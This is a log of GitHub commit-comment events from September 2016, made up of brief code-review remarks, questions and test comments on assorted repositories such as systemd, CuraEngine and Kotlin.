{"id":"4635967239","type":"CommitCommentEvent","actor":{"login":"calimeroteknik"},"repo":{"name":"systemd/systemd"},"payload":{"comment":{"id":19220912,"position":null,"line":null,"path":null,"commit_id":"8612da973d30c5a9530fa1b6b3d449147b5a3324","created_at":"2016-09-29T09:09:51Z","updated_at":"2016-09-29T09:09:51Z","body":"Creating files with 0777 mode by default is practically begging for problems and should be changed by removing this: https://github.com/systemd/systemd/blob/831d3dc8d7ab2719c90485274b537f4a7882fe66/src/core/main.c#L1397\r\n\r\nIf that's not changed, you will, again in the future, end up with unnoticeable and critical vulnerabilities like this one when you forget to use RUN_WITH_UMASK().\r\n\r\nIt would be so much safer to get something that doesn't work, and that you would notice and fix immediately as you test."}},"created_at":"2016-09-29T09:09:51Z"}
{"id":"4635973285","type":"CommitCommentEvent","actor":{"login":"doomedraven"},"repo":{"name":"cuckoosandbox/community"},"payload":{"comment":{"id":19220927,"position":50,"line":57,"path":"modules/signatures/windows/injection_network_traffic.py","commit_id":"84723023ae0bdd59aa90056f6abe7aa4acfb12e8","created_at":"2016-09-29T09:11:04Z","updated_at":"2016-09-29T09:11:04Z","body":"you can just do if not `host.startswith((\"127.\", \"10.\", \"172.16.\", \"192.168.\"))`"}},"created_at":"2016-09-29T09:11:04Z"}
{"id":"4635973503","type":"CommitCommentEvent","actor":{"login":"Miwrzezl"},"repo":{"name":"TheSharks/WildBeast"},"payload":{"comment":{"id":19220928,"position":null,"line":null,"path":null,"commit_id":"264f42a75b2a6cd10fea510a609d19431a37dfaf","created_at":"2016-09-29T09:11:07Z","updated_at":"2016-09-29T09:11:07Z","body":"Its fine if you pull lol. This will stay until Duggle is a (working) CI that isn't on a user account. (pro tip: It'll be a long time when that happens.)"}},"created_at":"2016-09-29T09:11:07Z"}
{"id":"4635976407","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"peterkohaut/scummvm"},"payload":{"comment":{"id":19220930,"position":46,"line":57,"path":"engines/bladerunner/lights.cpp","commit_id":"158c077a8f031ed1a716bcc344e8577df3627761","created_at":"2016-09-29T09:11:40Z","updated_at":"2016-09-29T09:11:40Z","body":"This does not process _lights[0]. Is that correct?"}},"created_at":"2016-09-29T09:11:40Z"}
{"id":"4635981103","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"peterkohaut/scummvm"},"payload":{"comment":{"id":19220936,"position":106,"line":109,"path":"engines/bladerunner/lights.cpp","commit_id":"158c077a8f031ed1a716bcc344e8577df3627761","created_at":"2016-09-29T09:12:35Z","updated_at":"2016-09-29T09:12:35Z","body":"Same here. The delete will not be called for _lights[0]."}},"created_at":"2016-09-29T09:12:35Z"}
{"id":"4635982022","type":"CommitCommentEvent","actor":{"login":"clementFoyer"},"repo":{"name":"bosilca/ompi"},"payload":{"comment":{"id":19220937,"position":59,"line":69,"path":"ompi/mca/pml/monitoring/pml_monitoring_component.c","commit_id":"a43c2ce52979117d5acf4f8098a1b468f476f8db","created_at":"2016-09-29T09:12:45Z","updated_at":"2016-09-29T09:12:45Z","body":"Should the string length be returned or the buffer size? MPI standard about returning strings requests (when there is a parameter with the buffer) to have the buffer size to be returned (chap 14.3.3,  p.569, l.36-48).\r\nAnyhow, whether it's the buffer size or string length, this information should be documented in the description of the variable, and in the HowTo document."}},"created_at":"2016-09-29T09:12:45Z"}
{"id":"4635990935","type":"CommitCommentEvent","actor":{"login":"equivalent"},"repo":{"name":"siegy22/inputs"},"payload":{"comment":{"id":19220944,"position":null,"line":null,"path":null,"commit_id":"0995381ee24f6c4059fd77e0591f49f24f254269","created_at":"2016-09-29T09:14:25Z","updated_at":"2016-09-29T09:14:25Z","body":"good point :+1: , Pull Request welcomed on this ;) "}},"created_at":"2016-09-29T09:14:25Z"}
{"id":"4635991628","type":"CommitCommentEvent","actor":{"login":"rgaiacs"},"repo":{"name":"scipy-latinamerica/scipyla2017"},"payload":{"comment":{"id":19220946,"position":5,"line":114,"path":"docs/tracks.md","commit_id":"8f17150d2422cab0219a113cc60c1e3a2858995d","created_at":"2016-09-29T09:14:32Z","updated_at":"2016-09-29T09:14:32Z","body":"Why not only say Engineers?"}},"created_at":"2016-09-29T09:14:32Z"}
{"id":"4635992929","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"Mara-AspIT/Examples"},"payload":{"comment":{"id":19220950,"position":5,"line":15,"path":"Examples.Tcp/Entities/Message.cs","commit_id":"b50271cf1a4940b06c3a342754ef40cea0f75f9c","created_at":"2016-09-29T09:14:48Z","updated_at":"2016-09-29T09:14:48Z","body":"Eftersom der er mulighed for at din setter kaster en exception, bør du nok overveje en try-catch her."}},"created_at":"2016-09-29T09:14:48Z"}
{"id":"4635992955","type":"CommitCommentEvent","actor":{"login":"rgaiacs"},"repo":{"name":"scipy-latinamerica/scipyla2017"},"payload":{"comment":{"id":19220951,"position":14,"line":330,"path":"docs/tracks.md","commit_id":"8f17150d2422cab0219a113cc60c1e3a2858995d","created_at":"2016-09-29T09:14:49Z","updated_at":"2016-09-29T09:14:49Z","body":"Modern Societies doesn't mean anything to me."}},"created_at":"2016-09-29T09:14:49Z"}
{"id":"4636004707","type":"CommitCommentEvent","actor":{"login":"deirdresm"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19220977,"position":null,"line":null,"path":null,"commit_id":"f3b4efb51a27820a858e450f432246c9f5051a96","created_at":"2016-09-29T09:17:02Z","updated_at":"2016-09-29T09:17:02Z","body":"That's a database connections thing, unlikely to be related to this commit. See #305 and #71."}},"created_at":"2016-09-29T09:17:02Z"}
{"id":"4636007660","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"benj4183/Polimorphism"},"payload":{"comment":{"id":19220986,"position":null,"line":null,"path":null,"commit_id":"aa324399bc68dfc8eb6960c7cc07a8b22490d45f","created_at":"2016-09-29T09:17:37Z","updated_at":"2016-09-29T09:17:37Z","body":"Det er ikke en del af opgaven at tilføje UML diagrammet. Det er blot meningen at UML diagrammet skal implementeres."}},"created_at":"2016-09-29T09:17:37Z"}
{"id":"4636014237","type":"CommitCommentEvent","actor":{"login":"JojoKarl"},"repo":{"name":"EmilBaath/MusicLibrary"},"payload":{"comment":{"id":19221003,"position":null,"line":null,"path":null,"commit_id":"0e8ef6450c5cebeba799811b4b6e21ca3072268a","created_at":"2016-09-29T09:18:53Z","updated_at":"2016-09-29T09:18:53Z","body":"Nothing new, just need new Pull from Master"}},"created_at":"2016-09-29T09:18:53Z"}
{"id":"4636021396","type":"CommitCommentEvent","actor":{"login":"jmfrancois"},"repo":{"name":"Talend/components"},"payload":{"comment":{"id":19221016,"position":24,"line":193,"path":"components-filedelimited/src/main/java/org/talend/components/filedelimited/runtime/FileDelimitedAvroRegistry.java","commit_id":"3f9746d02a121806e896e98d1e520566b2274878","created_at":"2016-09-29T09:20:10Z","updated_at":"2016-09-29T09:20:10Z","body":"I'm sure it can be done in a better way\r\n```java\r\nreturn true;\r\n```"}},"created_at":"2016-09-29T09:20:10Z"}
{"id":"4636024204","type":"CommitCommentEvent","actor":{"login":"higeeksun"},"repo":{"name":"higeeksun/helloworld"},"payload":{"comment":{"id":19221019,"position":1,"line":1,"path":"README.md","commit_id":"046f6bcc3eb1a7b27c8b3753783fbe9158bed2db","created_at":"2016-09-29T09:20:39Z","updated_at":"2016-09-29T09:20:39Z","body":"test"}},"created_at":"2016-09-29T09:20:39Z"}
{"id":"4636024212","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19221020,"position":50,"line":50,"path":"src/utils/PolygonsPointIndex.h","commit_id":"5ba9026632254d71c4ca0b6472b7158aa4e54d74","created_at":"2016-09-29T09:20:39Z","updated_at":"2016-09-29T09:20:39Z","body":"Typo: `Wether` -> `Whether`\r\n\r\n(Not blocking.)"}},"created_at":"2016-09-29T09:20:39Z"}
{"id":"4636029743","type":"CommitCommentEvent","actor":{"login":"Slivo-fr"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19221027,"position":null,"line":null,"path":null,"commit_id":"f3b4efb51a27820a858e450f432246c9f5051a96","created_at":"2016-09-29T09:21:42Z","updated_at":"2016-09-29T09:21:42Z","body":"The strange thing is that it happens on /static/forts/shield/Valor_2.png [GET]\r\nWhy would it call DB ?\r\n\r\nAlso I'm running mysql and I'm the only user, without any worker running.\r\nCould it be a flask issue ?"}},"created_at":"2016-09-29T09:21:42Z"}
{"id":"4636033051","type":"CommitCommentEvent","actor":{"login":"lucasmaystre"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19221031,"position":null,"line":null,"path":null,"commit_id":"4e2a4f72a6f5cc7ea9ba707ca21eb0a49df76d1e","created_at":"2016-09-29T09:22:20Z","updated_at":"2016-09-29T09:22:20Z","body":"merci pour tes commentaires! 👍  beaucoup de choses utiles. Je m'attaque à ça dès notre prochaine session sur kickoff.ai.\r\nJe pense que les bets c'est clairement le plus complexe des scrapers... courage 🐹 "}},"created_at":"2016-09-29T09:22:20Z"}
{"id":"4636034976","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"shinpeimuraoka/ryu"},"payload":{"comment":{"id":19221034,"position":null,"line":null,"path":null,"commit_id":"07282e8e2ab742cb52132bf3a95faace691918e8","created_at":"2016-09-29T09:22:42Z","updated_at":"2016-09-29T09:22:42Z","body":"ofproto/nicira_ext: Add Nicira Extended Match fields\r\n\r\nとありますが「不足していた」という意味を込めて、\r\n\r\nAdd missing Nicira ...(略\r\n\r\nは、いかがでしょうか？"}},"created_at":"2016-09-29T09:22:42Z"}
{"id":"4636044057","type":"CommitCommentEvent","actor":{"login":"vishnubhagwan"},"repo":{"name":"vishnubhagwan/dokku"},"payload":{"comment":{"id":19221049,"position":null,"line":null,"path":null,"commit_id":"9018fee0e29a2df3b34c14873b1777c2fb4b3471","created_at":"2016-09-29T09:24:29Z","updated_at":"2016-09-29T09:24:29Z","body":"please review..if any thing is wrong.."}},"created_at":"2016-09-29T09:24:29Z"}
{"id":"4636045043","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19221051,"position":19,"line":576,"path":"src/utils/polygonUtils.cpp","commit_id":"f4461ca41aab8cc5b7b3c7b1ed06edacb5f97ccc","created_at":"2016-09-29T09:24:41Z","updated_at":"2016-09-29T09:24:41Z","body":"Would be nice to prevent this repetition. Can't you just call `PolygonUtils::findNearestVert(from, poly)` instead of the inner loop?"}},"created_at":"2016-09-29T09:24:41Z"}
{"id":"4636046171","type":"CommitCommentEvent","actor":{"login":"Jagged"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19221053,"position":null,"line":null,"path":null,"commit_id":"b5c4981bdd732dd7bfe336a25f1b0db0688f4795","created_at":"2016-09-29T09:24:53Z","updated_at":"2016-09-29T09:24:53Z","body":"I'm thinking of renaming Otherwise to something else, there's just something about the name that just doesn't feel like it fits with C#, normally `default` or `else` is what we expect to see.  Otherwise would probably fit better with VB, this ain't VerBose!\r\n\r\nSomething like this perhaps?\r\n```c#\r\n- xx.Match(x).Match(y).Default(z)\r\n- xx.Match(x).Match(y).OrThrow(..)\r\n\r\n- xx.Switch(x).Switch(y).Default(z)\r\n- xx.Switch(x).Switch(y).OrThrow(..)\r\n```\r\n\r\nHmm, I may have committed a change for this by the time you read this!"}},"created_at":"2016-09-29T09:24:53Z"}
{"id":"4636048027","type":"CommitCommentEvent","actor":{"login":"am-kantox"},"repo":{"name":"am-kantox/workflow-join"},"payload":{"comment":{"id":19221056,"position":29,"line":29,"path":"lib/workflow/join/simple/pending_transitions.rb","commit_id":"0f867d7f5076916c6812027c14d94d755ff779b2","created_at":"2016-09-29T09:25:13Z","updated_at":"2016-09-29T09:25:13Z","body":"There is a captious check for this transition to exist. This `rescue` is mostly a reassurance that this gem won’t ruin the original one. Probably yes, this should be logged, but I just didn’t want to bother with getting a rails logger, if we are over rails etc etc.\r\n\r\nAnyway, #1."}},"created_at":"2016-09-29T09:25:13Z"}
{"id":"4636049662","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"shinpeimuraoka/ryu"},"payload":{"comment":{"id":19221058,"position":null,"line":null,"path":null,"commit_id":"07282e8e2ab742cb52132bf3a95faace691918e8","created_at":"2016-09-29T09:25:32Z","updated_at":"2016-09-29T09:25:32Z","body":"少し頭出しをしましたが、\r\nOVS 2.6.90 は開発中の版なので、\r\n「この時点のものです」\r\nというには、曖昧なものになってしまいます。\r\n\r\n敢えてバージョンは書かない、というのもアリだと思います。"}},"created_at":"2016-09-29T09:25:32Z"}
{"id":"4636051314","type":"CommitCommentEvent","actor":{"login":"deirdresm"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19221059,"position":null,"line":null,"path":null,"commit_id":"f3b4efb51a27820a858e450f432246c9f5051a96","created_at":"2016-09-29T09:25:50Z","updated_at":"2016-09-29T09:25:50Z","body":"The #help channel on discord is better than trying to diagnose on a commit.\r\n\r\nThis does seem to be related to a database request as that's what playhouse is."}},"created_at":"2016-09-29T09:25:50Z"}
{"id":"4636051723","type":"CommitCommentEvent","actor":{"login":"huayra"},"repo":{"name":"huayra/varnish-wiki"},"payload":{"comment":{"id":19221061,"position":null,"line":null,"path":null,"commit_id":"ec974c011785c46ebc01181e66f37e9ecf9d560c","created_at":"2016-09-29T09:25:55Z","updated_at":"2016-09-29T09:25:55Z","body":"Actually, that was Zoe, not Erika."}},"created_at":"2016-09-29T09:25:55Z"}
{"id":"4636052186","type":"CommitCommentEvent","actor":{"login":"siegy22"},"repo":{"name":"siegy22/inputs"},"payload":{"comment":{"id":19221064,"position":null,"line":null,"path":null,"commit_id":"0995381ee24f6c4059fd77e0591f49f24f254269","created_at":"2016-09-29T09:26:01Z","updated_at":"2016-09-29T09:26:01Z","body":"@equivalent lol :joy:"}},"created_at":"2016-09-29T09:26:01Z"}
{"id":"4636054944","type":"CommitCommentEvent","actor":{"login":"hlaturkar1234"},"repo":{"name":"pdalavi/VG_Automation"},"payload":{"comment":{"id":19221067,"position":1,"line":1,"path":"TPGW_Stress/Test_cases/sanity_test.log","commit_id":"239a25b200d65d5bb499e1ad15d0055d4b0e4b09","created_at":"2016-09-29T09:26:33Z","updated_at":"2016-09-29T09:26:33Z","body":"Remove a log file from the clone "}},"created_at":"2016-09-29T09:26:33Z"}
{"id":"4636058624","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"jacob4684/Polymorphism"},"payload":{"comment":{"id":19221079,"position":14,"line":14,"path":"PersonPolymorphism/Person.cs","commit_id":"4d4c5e9f3505b16af05b633be19e91732626984f","created_at":"2016-09-29T09:27:18Z","updated_at":"2016-09-29T09:27:18Z","body":"Hvorfor object som datatype?"}},"created_at":"2016-09-29T09:27:18Z"}
{"id":"4636060573","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19221084,"position":1,"line":1,"path":"фывфыв","commit_id":"c7d16d5623de55b7739625baf521acd5140fa22a","created_at":"2016-09-29T09:27:41Z","updated_at":"2016-09-29T09:27:41Z","body":"kkjkkj"}},"created_at":"2016-09-29T09:27:41Z"}
{"id":"4636071290","type":"CommitCommentEvent","actor":{"login":"harokb"},"repo":{"name":"harokb/fractal"},"payload":{"comment":{"id":19221099,"position":74,"line":57,"path":"fractal.py","commit_id":"7b8227d7d32871de2160b72ebb3efc98342dc75a","created_at":"2016-09-29T09:29:38Z","updated_at":"2016-09-29T09:29:38Z","body":"Should remove this dead code.\r\n"}},"created_at":"2016-09-29T09:29:38Z"}
{"id":"4636072510","type":"CommitCommentEvent","actor":{"login":"harokb"},"repo":{"name":"harokb/fractal"},"payload":{"comment":{"id":19221101,"position":36,"line":31,"path":"fractal.py","commit_id":"7b8227d7d32871de2160b72ebb3efc98342dc75a","created_at":"2016-09-29T09:29:53Z","updated_at":"2016-09-29T09:29:53Z","body":"Should add attribution\r\n"}},"created_at":"2016-09-29T09:29:53Z"}
{"id":"4636077500","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19221105,"position":45,"line":45,"path":"entity.py","commit_id":"8918cddc69b59ddffe7073c8712e09d741498f08","created_at":"2016-09-29T09:30:45Z","updated_at":"2016-09-29T09:30:45Z","body":"Rename `db_task` to `db_record`."}},"created_at":"2016-09-29T09:30:45Z"}
{"id":"4636081060","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19221111,"position":null,"line":null,"path":null,"commit_id":"fb588cc683107fbb0e9dfc0acab1149122486c8c","created_at":"2016-09-29T09:31:26Z","updated_at":"2016-09-29T09:31:26Z","body":"iteration (evanweaver) - i386-Windows-7-VisualStudio-12: OK (2410 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.45%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T09:31:26Z"}
{"id":"4636083579","type":"CommitCommentEvent","actor":{"login":"BelminSalkica"},"repo":{"name":"BelminSalkica/WIP-Zadace"},"payload":{"comment":{"id":19221114,"position":null,"line":null,"path":null,"commit_id":"71436e37dac3ba527b978e6207dc21543b894565","created_at":"2016-09-29T09:31:55Z","updated_at":"2016-09-29T09:31:55Z","body":"Ovo je prva verzija gdje mi je najbitnije funkcionalnost još imam nekoliko stvari odraditi što se tiče izgleda aplikacije."}},"created_at":"2016-09-29T09:31:55Z"}
{"id":"4636084104","type":"CommitCommentEvent","actor":{"login":"NickolasDePiton"},"repo":{"name":"NickolasDePiton/Stack"},"payload":{"comment":{"id":19221116,"position":null,"line":null,"path":null,"commit_id":"84bdc08625c10d8d882bb59e371fe88bec154c72","created_at":"2016-09-29T09:32:01Z","updated_at":"2016-09-29T09:32:01Z","body":"Добавлены метки"}},"created_at":"2016-09-29T09:32:01Z"}
{"id":"4636086956","type":"CommitCommentEvent","actor":{"login":"nourmon"},"repo":{"name":"nourmon/SCUOLA"},"payload":{"comment":{"id":19221117,"position":1,"line":1,"path":"ciao.txt","commit_id":"3a8fb9b2b29ae9cf3463127dd247db23bd542f8c","created_at":"2016-09-29T09:32:33Z","updated_at":"2016-09-29T09:32:33Z","body":"Una prova per mostrarla al professor Morettin Andrea"}},"created_at":"2016-09-29T09:32:33Z"}
{"id":"4636089526","type":"CommitCommentEvent","actor":{"login":"thomaspatzke"},"repo":{"name":"govolution/betterdefaultpasslist"},"payload":{"comment":{"id":19221119,"position":null,"line":null,"path":null,"commit_id":"7c20c24e997ba64b1772ae5543dfd1c0d484c1cf","created_at":"2016-09-29T09:33:02Z","updated_at":"2016-09-29T09:33:02Z","body":"UR damn thief, sir! I have found this bug, you have stolen! Gimme bounty, sir!"}},"created_at":"2016-09-29T09:33:02Z"}
{"id":"4636090696","type":"CommitCommentEvent","actor":{"login":"goodwinnk"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19221122,"position":5,"line":66,"path":"idea/src/org/jetbrains/kotlin/idea/codeInsight/postfix/stringBasedPostfixTemplates.kt","commit_id":"f25cc7d11bd9a019a224f6251bf82afd9af40b3e","created_at":"2016-09-29T09:33:15Z","updated_at":"2016-09-29T09:33:15Z","body":"Please add test for this modification."}},"created_at":"2016-09-29T09:33:15Z"}
{"id":"4636093610","type":"CommitCommentEvent","actor":{"login":"Mike5454"},"repo":{"name":"Mike5454/ME_701_HW4"},"payload":{"comment":{"id":19221126,"position":null,"line":null,"path":null,"commit_id":"9cf30fd450b1b9af32350aac32aaea75f8e0a5fa","created_at":"2016-09-29T09:33:49Z","updated_at":"2016-09-29T09:33:49Z","body":"In problem number 3 you need to run give[#] where # refers to the list desired. 0 for Atomic Number, 1 for Atomic Symbol, 2 for Mass Number, and 3 for Standard Atomic Weight. \r\n\r\nBecause there are so many numbers and they tend to get cut-off in python I also provided an atomic mass alternative file that will output all of the lists on a text file. This could be useful if these numbers were to be copied into a spreadsheet. Problem 3 seemed a little vague with how you wanted the lists so I hope this is what you wanted."}},"created_at":"2016-09-29T09:33:49Z"}
{"id":"4636093699","type":"CommitCommentEvent","actor":{"login":"amrdruid"},"repo":{"name":"Elkont33/Hospitalreach"},"payload":{"comment":{"id":19221127,"position":4,"line":4,"path":"app/models/admin.rb","commit_id":"862faeb5ceeadba5ecbd34fd99740d41f6d20748","created_at":"2016-09-29T09:33:50Z","updated_at":"2016-09-29T09:33:50Z","body":"Why making it capital ? =D"}},"created_at":"2016-09-29T09:33:50Z"}
{"id":"4636094473","type":"CommitCommentEvent","actor":{"login":"amrdruid"},"repo":{"name":"Elkont33/Hospitalreach"},"payload":{"comment":{"id":19221130,"position":4,"line":4,"path":"app/models/doctor.rb","commit_id":"862faeb5ceeadba5ecbd34fd99740d41f6d20748","created_at":"2016-09-29T09:34:00Z","updated_at":"2016-09-29T09:34:00Z","body":"Why making it capital ? =D"}},"created_at":"2016-09-29T09:34:00Z"}
{"id":"4636097632","type":"CommitCommentEvent","actor":{"login":"amrdruid"},"repo":{"name":"Elkont33/Hospitalreach"},"payload":{"comment":{"id":19221135,"position":4,"line":4,"path":"app/models/doctor.rb","commit_id":"862faeb5ceeadba5ecbd34fd99740d41f6d20748","created_at":"2016-09-29T09:34:34Z","updated_at":"2016-09-29T09:34:34Z","body":"belongs_to hospital, dah ely etf2na 3aleeh sa7 ?"}},"created_at":"2016-09-29T09:34:34Z"}
{"id":"4636102353","type":"CommitCommentEvent","actor":{"login":"goodwinnk"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19221141,"position":1,"line":1,"path":"idea/testData/codeInsight/postfix/whenExpression.kt.after","commit_id":"fb4af3e6b3bd7d11c6332b35fff23f898406a6ef","created_at":"2016-09-29T09:35:26Z","updated_at":"2016-09-29T09:35:26Z","body":"Should other cases be tested too?"}},"created_at":"2016-09-29T09:35:26Z"}
{"id":"4636107659","type":"CommitCommentEvent","actor":{"login":"walkandthinker"},"repo":{"name":"walkandthinker/FeapBackup"},"payload":{"comment":{"id":19221152,"position":null,"line":null,"path":null,"commit_id":"c9f41b69380dbe80514812e6a41fe8527d97c796","created_at":"2016-09-29T09:36:27Z","updated_at":"2016-09-29T09:36:27Z","body":"2D Linear Elastic Problems"}},"created_at":"2016-09-29T09:36:27Z"}
{"id":"4636107931","type":"CommitCommentEvent","actor":{"login":"lptr"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":19221154,"position":7,"line":86,"path":"gradle/groovyProject.gradle","commit_id":"55f146bd1888436d11e923282fa82e31e1b4322b","created_at":"2016-09-29T09:36:30Z","updated_at":"2016-09-29T09:36:30Z","body":"This should have been marked as `@Classpath`."}},"created_at":"2016-09-29T09:36:30Z"}
{"id":"4636118058","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19221174,"position":30,"line":38,"path":"src/utils/polygonUtils.cpp","commit_id":"263bb3099b4302bc96ee40619e9f3b002af702ea","created_at":"2016-09-29T09:38:23Z","updated_at":"2016-09-29T09:38:23Z","body":"Compiler gives a warning about this. If this ever happens in production, we're reading uninitialised memory."}},"created_at":"2016-09-29T09:38:23Z"}
{"id":"4636119342","type":"CommitCommentEvent","actor":{"login":"fritx"},"repo":{"name":"fritx/react-editor"},"payload":{"comment":{"id":19221179,"position":41,"line":44,"path":"src/format.js","commit_id":"d13ed50ded992c6fd393be5f9b0ab9e95fdea977","created_at":"2016-09-29T09:38:38Z","updated_at":"2016-09-29T09:38:38Z","body":"should keep only `.nocopy` for filter condition"}},"created_at":"2016-09-29T09:38:38Z"}
{"id":"4636122836","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19221182,"position":null,"line":null,"path":null,"commit_id":"d12387441758902374a7d552598ef4bac74f80f8","created_at":"2016-09-29T09:39:18Z","updated_at":"2016-09-29T09:39:18Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8085/ui#review:id=1)"}},"created_at":"2016-09-29T09:39:18Z"}
{"id":"4636124068","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19221184,"position":1,"line":1,"path":"sfdsdf","commit_id":"d12387441758902374a7d552598ef4bac74f80f8","created_at":"2016-09-29T09:39:32Z","updated_at":"2016-09-29T09:39:32Z","body":"sadfsf"}},"created_at":"2016-09-29T09:39:32Z"}
{"id":"4636126815","type":"CommitCommentEvent","actor":{"login":"fritx"},"repo":{"name":"fritx/react-editor"},"payload":{"comment":{"id":19221188,"position":68,"line":66,"path":"src/Editor.js","commit_id":"d13ed50ded992c6fd393be5f9b0ab9e95fdea977","created_at":"2016-09-29T09:40:01Z","updated_at":"2016-09-29T09:40:01Z","body":"```js\r\n// mac上base64图片 text存在 html为空\r\n// 发送消息时有安全过滤 不怕恶意代码插入\r\nif (!html.trim() && /^\\s*data:image\\//.test(text)) {\r\n  html = `<img src=\"${text.trim()}\">`\r\n} else {\r\n  // 放入else 因为后者意外地包含前者\r\n  // 在mac上直接从finder复制粘贴文件 nw无法获取具体路径\r\n  // 因此直接忽略行为 windows本身也是忽略\r\n  // qq能正常响应并且发送文件 这点我们做不到\r\n  const isFinderCopy = types[0] === 'text/plain'\r\n    && types[1] === 'Files'\r\n    && !/^https?:\\/\\//.test(text)\r\n  if (isFinderCopy) return\r\n}\r\n```"}},"created_at":"2016-09-29T09:40:01Z"}
{"id":"4636129671","type":"CommitCommentEvent","actor":{"login":"lejimenvi"},"repo":{"name":"lejimenvi/hello-world"},"payload":{"comment":{"id":19221197,"position":3,"line":3,"path":"README.md","commit_id":"21d40660d45f5de5f0e3a7144bdc26c0698cc197","created_at":"2016-09-29T09:40:32Z","updated_at":"2016-09-29T09:40:32Z","body":"Vamos com'on"}},"created_at":"2016-09-29T09:40:32Z"}
{"id":"4636132139","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19221201,"position":null,"line":null,"path":null,"commit_id":"9958542eb3692732e93b22ba0d059eebaa8d3bef","created_at":"2016-09-29T09:41:00Z","updated_at":"2016-09-29T09:41:00Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8085/ui#review:id=3)"}},"created_at":"2016-09-29T09:41:00Z"}
{"id":"4636132234","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/Madrague"},"payload":{"comment":{"id":19221202,"position":null,"line":null,"path":null,"commit_id":"b3a50976cad5139b8f246674b51d7c7574d1d48d","created_at":"2016-09-29T09:41:01Z","updated_at":"2016-09-29T09:41:01Z","body":"On vérifie si le WebHook odoo fonctionne"}},"created_at":"2016-09-29T09:41:01Z"}
{"id":"4636134590","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19221206,"position":null,"line":null,"path":null,"commit_id":"032e8f8e5ff4f6dd39492ab75d9ef5c7ff226eca","created_at":"2016-09-29T09:41:27Z","updated_at":"2016-09-29T09:41:27Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8085/ui#review:id=4)"}},"created_at":"2016-09-29T09:41:27Z"}
{"id":"4636135152","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19221207,"position":null,"line":null,"path":null,"commit_id":"fe42ec9de7e99ce9b902cec6e9d916cd8c0e9994","created_at":"2016-09-29T09:41:33Z","updated_at":"2016-09-29T09:41:33Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8085/ui#review:id=5)"}},"created_at":"2016-09-29T09:41:33Z"}
{"id":"4636141311","type":"CommitCommentEvent","actor":{"login":"ktoso"},"repo":{"name":"spockz/sbt-maven-plugin"},"payload":{"comment":{"id":19221222,"position":null,"line":null,"path":null,"commit_id":"29126ad616687fb7d0cb9594b4f70a9b2ae07309","created_at":"2016-09-29T09:42:47Z","updated_at":"2016-09-29T09:42:47Z","body":"Hacky but works, that's fine :-)\r\nKudos @spockz!"}},"created_at":"2016-09-29T09:42:47Z"}
{"id":"4636141677","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19221223,"position":75,"line":77,"path":"src/utils/polygonUtils.cpp","commit_id":"263bb3099b4302bc96ee40619e9f3b002af702ea","created_at":"2016-09-29T09:42:51Z","updated_at":"2016-09-29T09:42:51Z","body":"Just make this your condition for the `while` loop?"}},"created_at":"2016-09-29T09:42:51Z"}
{"id":"4636144452","type":"CommitCommentEvent","actor":{"login":"Jeremy0703"},"repo":{"name":"arthurdufutur/TP-4"},"payload":{"comment":{"id":19221233,"position":null,"line":null,"path":null,"commit_id":"b5eaa71b339b09808590f02cf7e115478e962260","created_at":"2016-09-29T09:43:24Z","updated_at":"2016-09-29T09:43:24Z","body":"ahah bien ouej pd"}},"created_at":"2016-09-29T09:43:24Z"}
